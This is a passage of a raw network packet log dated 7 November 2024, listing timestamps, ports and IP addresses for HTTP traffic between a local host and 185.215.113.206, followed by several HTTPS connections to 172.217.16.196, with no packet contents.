Nov 7, 2024 04:12:04.387084961 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387088060 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387101889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387111902 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387115955 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387131929 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387145996 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387152910 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387180090 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387191057 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387203932 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387203932 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387234926 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387259960 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387264013 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387278080 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387290955 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387304068 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387304068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387332916 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387355089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387358904 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387370110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387384892 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387394905 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387408972 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387420893 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387423038 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387438059 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387442112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387460947 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387463093 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387475014 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387490988 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387500048 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387505054 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387528896 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387563944 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387566090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387581110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387593985 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387603998 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387609005 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387629032 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387636900 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387650013 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387659073 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387695074 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387697935 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387712002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387726068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387741089 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387742043 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387762070 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387769938 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387777090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387792110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387804985 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387809992 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387828112 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387849092 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387909889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387923002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387936115 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387949944 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387955904 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387964010 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.387974024 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.387986898 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388000965 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388015032 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388015032 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388029099 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388031960 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388051033 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388065100 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388067961 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388078928 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388092041 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388104916 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388124943 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388128042 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388144016 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388148069 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388164043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388170004 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388178110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388197899 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388221025 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388227940 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388257027 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388264894 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388272047 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388286114 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388297081 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388322115 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388344049 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388345957 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388356924 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388369083 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388392925 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388405085 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388411999 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388421059 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388447046 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388454914 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388468981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388477087 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388482094 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388499022 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388504028 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388513088 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388524055 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388566971 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388587952 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388602018 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388614893 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388628006 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388633013 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388681889 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388695955 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388708115 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388708115 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388709068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388732910 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388750076 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388752937 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388767004 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388773918 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388780117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388792992 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388798952 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388808012 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388809919 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388823986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388838053 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388847113 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388859034 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388869047 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388894081 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388899088 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388909101 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388925076 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.388933897 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388967991 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.388991117 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389004946 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389018059 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389029026 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389041901 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389045000 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389067888 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389095068 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389103889 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389108896 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389132023 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389132023 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389146090 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389153004 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389161110 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389173031 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389174938 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389194965 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389200926 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389209986 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389224052 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389235020 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389239073 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389254093 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389261961 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389298916 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389302969 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389311075 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389338017 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389369011 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389452934 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389467955 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389482021 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389501095 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389503002 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389517069 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389518023 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389530897 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389554024 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389575958 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389585018 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389590025 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389606953 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389616013 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389652014 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389661074 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389674902 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389688969 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389702082 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389713049 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389715910 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389734983 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389738083 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389753103 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389764071 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389772892 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389786959 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389801979 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389813900 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389816999 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389834881 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389836073 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389857054 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389857054 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389873981 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389888048 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389889956 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389905930 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389909029 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389919043 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389931917 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389941931 CET	80	49730	185.215.113.206	192.168.2.4
Nov 7, 2024 04:12:04.389942884 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389974117 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:04.389997959 CET	49730	80	192.168.2.4	185.215.113.206
Nov 7, 2024 04:12:05.873313904 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:05.873331070 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:05.873390913 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:05.873647928 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:05.873665094 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:05.963773966 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:05.963814020 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:05.963876009 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:05.964282036 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:05.964298010 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.040528059 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.040549994 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.040636063 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.040877104 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.040889978 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.216088057 CET	49737	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.216110945 CET	443	49737	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.216171980 CET	49737	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.216569901 CET	49737	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.216583967 CET	443	49737	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.746422052 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.746767044 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.746786118 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.747641087 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.747699976 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.748960972 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.749017000 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.749269962 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.749278069 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.795919895 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.818929911 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.823764086 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.823782921 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.824860096 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.824987888 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.834021091 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.834021091 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.834124088 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.879740953 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.879751921 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.887370110 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.887811899 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.887825012 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.888844967 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.888917923 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.889383078 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.889445066 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.891742945 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.891751051 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:06.924113989 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:06.939733982 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.019848108 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.019896030 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.019927025 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.019953012 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.019967079 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.020133972 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.021594048 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.022407055 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.022440910 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.022555113 CET	443	49734	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.022624969 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.022624969 CET	49734	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.063255072 CET	443	49737	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.063539982 CET	49737	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.063555002 CET	443	49737	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.064580917 CET	443	49737	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.064685106 CET	49737	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.065198898 CET	49737	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.065268993 CET	443	49737	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.111581087 CET	49737	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.111588001 CET	443	49737	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.119065046 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.119205952 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.119298935 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.119332075 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.119362116 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.119513988 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.119558096 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.119569063 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.119740009 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.119746923 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.127043009 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.127767086 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.127773046 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.159213066 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.159264088 CET	49737	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.174180984 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.174190044 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.205382109 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.205398083 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.207736015 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.207777977 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.207916021 CET	443	49736	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.208026886 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.208026886 CET	49736	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.223772049 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.237392902 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.237482071 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.238456011 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.238481045 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.239753008 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.239759922 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.242888927 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.243741035 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.243746996 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.251668930 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.252146006 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.252155066 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.260368109 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.260766983 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.260773897 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.269155025 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.269263029 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.269268990 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.277731895 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.278023005 CET	49735	443	192.168.2.4	172.217.16.196
Nov 7, 2024 04:12:07.278028011 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.285697937 CET	443	49735	172.217.16.196	192.168.2.4
Nov 7, 2024 04:12:07.285984993 CET	49735	443	192.168.2.4	172.217.16.196
